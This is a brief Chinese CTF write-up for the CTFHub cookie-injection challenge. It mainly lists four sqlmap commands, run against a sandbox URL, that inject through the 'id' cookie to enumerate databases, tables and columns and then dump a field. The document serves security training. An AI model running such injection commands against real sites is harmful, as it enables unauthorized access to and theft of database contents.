CTFHub-cookie注入
手工注入
根据提示查找cookie值后通过burpsuite抓包改变cookie值来实现注入,不再赘述

sqlmap注入
查询数据库名:sqlmap.py -u http://challenge-9ae1c4fc157765eb.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 --dbs

查询表名:sqlmap.py -u http://challenge-9ae1c4fc157765eb.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli --tables

查询字段名:sqlmap.py -u http://challenge-9ae1c4fc157765eb.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli -T ggathoowju --columns

dump出字段信息:sqlmap.py -u http://challenge-9ae1c4fc157765eb.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli -T ggathoowju -C qtegoprsaa --dump


浙公网安备 33010602011771号